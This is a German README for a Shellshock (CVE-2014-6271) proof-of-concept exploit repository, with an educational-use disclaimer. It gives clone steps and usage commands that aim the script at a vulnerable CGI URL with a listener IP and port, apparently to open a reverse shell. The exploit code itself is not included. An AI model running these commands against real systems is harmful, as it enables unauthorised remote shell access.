
Shellshock-Exploit (CVE-2014-6271)
Dieses Repository enthält einen Exploit für eine Sicherheitslücke, die Unix-basierte Systeme betrifft. Bitte beachten Sie, dass dies lediglich ein Proof-of-Concept-Skript ist, das zu Bildungszwecken erstellt wurde und verantwortungsvoll genutzt werden sollte.
Dieser Exploit soll demonstrieren, wie der Shellshock-Angriff funktioniert und wie er genutzt werden könnte, um über einen böswillig gestalteten Anfrage-Header Shell-Zugriff auf ein System zu erlangen.
Dieses Repository dient ausschließlich Bildungszwecken. Verwenden Sie diesen Code oder die darin enthaltenen Informationen nicht für böswillige Zwecke. Halten Sie sich stets an ethische Richtlinien und respektieren Sie das Gesetz.
Verwendung:
python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]
Beispiel:
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
Voraussetzungen:
Klonen Sie dieses Repository auf Ihren lokalen Rechner.
git clone https://github.com/AlissonFaoli/Shellshock.git
Wechseln Sie in das Projektverzeichnis.
cd Shellshock
Führen Sie das Skript shellshock.py aus.
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
Dieser Exploit wird unter der MIT-Lizenz veröffentlicht. Weitere Informationen finden Sie in der Datei LICENSE.
Wenn Sie Fragen oder Bedenken zu diesem Exploit haben, können Sie sich gerne an den Autor wenden.